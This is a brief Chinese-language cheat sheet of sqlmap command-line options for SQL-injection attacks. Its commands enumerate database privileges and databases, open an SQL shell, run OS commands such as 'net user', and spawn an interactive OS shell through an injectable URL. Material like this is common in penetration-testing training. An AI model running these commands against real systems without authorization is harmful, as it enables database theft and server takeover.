注入神器sqlmap:
Sqlmap參數:
1)測試注入點權限
sqlmap -u [url] --privileges //測試所有使用者的權限
sqlmap -u [url] --privileges -U sa //測試使用者sa的權限
2)執行shell指令
sqlmap -u [url] --os-cmd="net user" //執行net user指令
sqlmap -u [url] --os-shell //系統互動的shell
3)擷取目前資料庫名稱
sqlmap -u [url] --current-db
4)執行SQL指令
sqlmap -u [url] --sql-shell //傳回sql互動的shell,可以執行sql語句
5)POST送出方式
sqlmap -u [url] --data "POST參數"
6)顯示詳細的等級
sqlmap -u [url] --dbs -v 1
{
0:隻顯示Python的回溯資訊、錯誤資訊[ERROR]和關鍵資訊[CRITICAL];
1:顯示普通資訊[INFO]和警告資訊[WARNING];
2:顯示調試資訊[DEBUG];
3:顯示注入使用的攻擊荷載;
4:顯示HTTP請求;
5:顯示HTTP響應頭;
6:顯示HTTP響應内容。
}
7)注入http請求
sqlmap -r head.txt --dbs //head.txt内容為http請求
8)直接連接配接到資料庫
sqlmap -d "mysql://[email protected]:3306/testdb" --dbs
9)注入等級
sqlmap -u [url] --level 3
10)将注入語句插入到指定位置(使用*将sql語句指定插入到指定位置)
sqlmap -u “http://www.xxser.com/id/2*html” --dbs
完整版Sqlmap指令參數:
